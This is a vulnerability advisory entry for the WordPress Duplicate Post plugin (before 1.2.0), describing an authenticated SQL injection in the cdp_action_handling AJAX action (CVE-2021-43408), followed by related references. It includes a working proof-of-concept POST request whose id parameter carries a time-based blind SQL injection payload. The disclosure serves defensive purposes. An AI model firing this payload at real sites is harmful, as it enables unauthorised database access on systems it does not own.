Lucene search
WpvulndbWPEX-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4BHistoryOct 25, 2021 - 12:00 a.m.
Duplicate Post < 1.2.0 - Authenticated SQL Injection
2021-10-2500:00:00
wpvulndb
101
0.001 Low
EPSS
Percentile
38.5%
The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow user having access to the plugin (by default admins) to perform SQL Injection attacks
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 229
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_3d2361ff3a8f0d..(truncated)
Connection: close
action=cdp_action_handling&token=cdp&f=copy_post&origin=tooltip&id%5B%5D=1%20and%20(select*from(select(sleep(9)))a)--%20&data%5Btype%5D=copy-quick&data%5Btimes%5D=1&data%5Bsite%5D=-1&data%5Bprofile%5D=default&data%5Bswap%5D=false
Related
githubexploit
githubexploit
Exploit for SQL Injection in Duplicate Post Project Duplicate Post
2022-05-31 03:00:27
prion
prion
Sql injection
2021-11-19 16:15:00
patchstack
patchstack
nvd
nvd
CVE-2021-43408
2021-11-19 16:15:07
cvelist
cvelist
CVE-2021-43408 Duplicate Post WordPress Plugin SQL Injection Vulnerability
2021-10-19 00:00:00
cve
cve
CVE-2021-43408
2021-11-19 16:15:07
wpvulndb
wpvulndb
Duplicate Post < 1.2.0 - Authenticated SQL Injection
2021-10-25 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress Duplicate Post Plugin SQL Injection (CVE-2021-43408)
2021-12-15 00:00:00